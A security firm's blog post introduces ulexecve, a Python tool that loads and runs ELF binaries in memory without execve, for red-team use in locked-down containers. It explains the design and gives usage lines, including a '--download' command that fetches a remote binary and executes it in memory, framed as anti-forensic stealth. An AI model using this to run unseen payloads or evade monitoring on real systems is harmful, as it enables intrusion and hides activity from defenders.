By Vincent Berg
TL;DR: If you are familiar with what a userland binary execution tool does and you just want to see the code and/or test it, skip the rest of this post and go to the project's GitHub page.
On a recent engagement I found myself testing a Kubernetes environment. Through application-level bugs I had gotten remote shell access to some of its containers. For further exploration and analysis, I wanted to upload some arbitrary ELF binaries such as a statically compiled version of `nmap` to my chagrin, however, the containers were rather locked down. For example, all the writable filesystems were mounted with the
noexec option. This meant that, although I could upload my binaries successfully there, I could not execute them. The other filesystems were all mounted with the
ro (read-only) option so, writing anything there was impossible.
I still wanted to analyze things further inside the containers and the rest of the Kubernetes environment. I looked and saw that
python was installed on these container images so I at least had the ability to execute arbitrary Python code. I managed to use existing Python scripts as well as port some other tools to perform further analysis of the environment that way. It did get me thinking however, with how useful it would be to be able to execute arbitrary binaries from within Python. Finding a Python interpreter on running containers is, in my experience, a rather common occurrence. If I would then be able to just upload ELF binaries (compiled from Rust/Go/C/C++ whatever) and execute them using the Python interpreter it would make my life a whole lot easier. If only because I don't have to port every tool to Python first.
Before I move on to the implementation details of the userland execution in Python let us first look at what userland execution, more specifically on Linux, actually is.
What is Userland Execution?
Userland execution under Linux means implementing code that roughly replicates what the
execve() system call does. To quote the function definition as well as its description from the man page:
#include <unistd.h> int execve(const char *pathname, char *const argv, char *const envp); execve() executes the program referred to by pathname. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments.
That is what I need to implement. But let’s first look at alternative implementations and historical tools and research that preceded my efforts. Linux userland execve tools have a history that goes back roughly two decades. The first solid writeups on this were made by
the grugq in “The Design and Implementation of Userland Exec” as well as in another article in Phrack 62 titled “FIST! FIST! FIST! Its all in the wrist: Remote Exec”.
Anti-forensic techniques to execute binaries directly from memory are fairly standard nowadays for anyone wanting to hide their tracks. You can never have binaries be written to any long-term storage and only reside in memory and still execute them.
In other words: the idea behind all this is that instead of directly executing a new binary, you replace a currently running process by parsing a binary yourself and then mapping its segments at the right place in memory before transferring execution to the entry point in one of those segments. This is obviously great from a stealth perspective.
Another name for userland execution is reflection. Unlike the almost two decades old implementations by the grugq there is a more modern reflection implementation found in Rapid7’s mettle.
Mettle itself is a native-code Meterpreter version which contains a library named
libreflect. This library has a utility named
noexec which attempts to execute a binary via reflection only. However, this tool is written in C and it has the implicit requirement that you need to transfer the
noexec binary on the target system as well being able to execute this binary.
But all these solutions require another ELF binary to do the execution in userland. And obviously this ELF binary is not present in the container scenarios I talked about before. As such I searched for Python only implementations of a userland execution tool. The only one I could find was named SELF, by Maciej Kotowicz (mak). I could never get this to work and the implementation was rather crude. It seemed more like a proof of concept rather than anything I can seriously rely on. Based on looking at that however it did seem like it was at least possible to write such a tool in Python.
For the nitty gritty details, I would refer anyone to the code. But the overall approach is as follows. This tool allows you to load arbitrary ELF binaries on Linux systems and execute them without the binaries ever having to touch storage nor using any easily monitored system calls such as execve(). This should make it ideal for red team engagements as well as other anti-forensics purposes.
The design of the tool is fairly straightforward. It only uses standard CPython libraries and includes some backwards compatibility tricks to successfully run on 2.x releases as well as 3.x. When certain library calls are not implemented via libc on the platform this is running on they will be emulated. For example,
It is an explicit design-goal of this tool to not have any external dependencies. As such the assembly generation code can be seen to be pretty crude but this was very much preferred over pulling in external code generator libraries. Similarly, for splitting up versions of this for different platforms or make it more stealthily by having less options or removing all the debug information. This is trivially doable for anyone who wants to really integrate this in their red-team tooling and it is not an explicit goal of this tool itself. If anything, this is a reference implementation that can easily be adapted if you want to make smaller payloads for use in the real world.
ELF binaries are parsed and the
PT_LOAD segments are mapped into memory. We then must generate a so-called jump buffer. This buffer will contain raw CPU instructions because the newly loaded binary will most likely overwrite parts of the Python process’ memory regions. As such the moment we hand over control by starting to execute the jump buffer there is no way back and we will either crash and burn or successfully execute the reflected binary (assuming we have everything setup properly).
The parsing and the buildup of the stack is all standard. Ultimately, we call into a CPU-specific Code Generator. The tool will call
munmap() for each memory segment in order to unmap any possible Python memory regions. Then
mmap() calls are generated for each memory segment. The code generator for each CPU simply implements the system calls with the right arguments.
We do not always know where the binaries are mapped if they are for example position independent binaries. As such each Code Generator will need to store the result of the main binary
mmap() in an intermediate register. For example, on
x86-64 we use
%r11, on x86
%ecx and on
aarch64 we use
Then we proceed to do two things. First we generate
memcpy() instructions which copy the ELF segments from the temporary Python ctypes buffers into the proper memory locations. This is done at the specified offset as parsed from the ELF file on top of the intermediate register as mentioned above. Secondly we now must fix up the auxiliary vector to make sure that the entries
AT_ENTRY are properly setup. This is to tie everything together for dynamic binaries and it ensures that the linker can do its job. For more information on this vector please refer to this great LWN article.
We also forward on any other entries such as the location of the
AT_SYSINFO_EHDR) from the original process such that any calls by the binary into
vDSO land work properly. During my research on why some binaries did not work I investigated this in detail and ended up fixing a bug in Rapid7’s mettle as well (see the pull request).
Once the code generator is done, we have a so-called jump buffer. The script transfers control from Python-land to the jump buffer. The built up instructions will be executed and ultimately the control will be transferred to the newly loaded binary.
The tool fully supports static and dynamically compiled executables. Simply pass the filename of the binary to
ulexecve and any arguments you want to supply to the binary. The environment will be directly copied over from the environment in which you execute
ulexecve /bin/ls -lha
You can have it read a binary from
stdin if you specify
- as the filename.
cat /bin/ls | ulexecve - -lha
To download a binary into memory and immediately execute it you can use
--download. This will interpret the filename argument as a URI.
ulexecve --download http://host/binary
Several options are available to debug. Debug information via
--debug, the built up stack via
--show-stack as well as the generated jump buffer
--jump-delay option is very useful if you want to parse and map an ELF properly and then attach a debugger to step through the jump buffer and the ultimate executing binary to find the cause of the crash.
cat /bin/echo | ulexecve --debug --show-stack --show-jumpbuf - hello ... PT_LOAD at offset 0x0002c520: flags=0x6, vaddr=0x2d520, filesz=0x1ad8, memsz=0x1c70 Loaded interpreter successfully Stack allocated at: 0x7fddf630e000 vDSO loaded at 0x7ffd8952e000 (Auxv entry AT_SYSINFO_EHDR), AT_SYSINFO: 0x00000000 Auxv entries: HWCAP=0x00000002, HWCAP2=0x00000002, AT_CLKTCK=0x00000064 stack contents: argv 00000000: 0x0000000000000002 00000008: 0x00007fddf6312410 ... Generated mmap call (addr=0x00000000, length=0x00030000, prot=0x7, flags=0x22) Generated memcpy call (dst=%r11 + 0x00000000, src=0x02534650, size=0x00000fc8) Generated memcpy call (dst=%r11 + 0x0002d520, src=0x0253d720, size=0x00001ad8) Generating jumpcode with entry_point=0x00001100 and stack=0x7fddf630e000 Jumpbuf with entry %r11+0x1100 and stack: 0x00007fddf630e000 Written jumpbuf to /tmp/tmphsiaygna.jumpbuf.bin (#592 bytes) Executing: objdump -m i386:x86-64 -b binary -D /tmp/tmphsiaygna.jumpbuf.bin ... 245: 00 00 00 248: 4c 01 d9 add %r11,%rcx 24b: 48 31 d2 xor %rdx,%rdx 24e: ff e1 jmpq *%rcx ... Memmove(0x7fddf6f0e000, 0x0254d7f0, 0x00000250) hello
You can find the tool at GitHub or install it via PyPI by running
pip install ulexecve.
About the Author
Vincent is a founding partner and CTO at Anvil Secure. Vincent’s strong technical background combined with his many years of consulting experience have contributed to the foundational belief that technical excellence and professionalism should be at the core of everything we do at Anvil. As CTO, he guides research and technical content, while maintaining a customer-focused approach.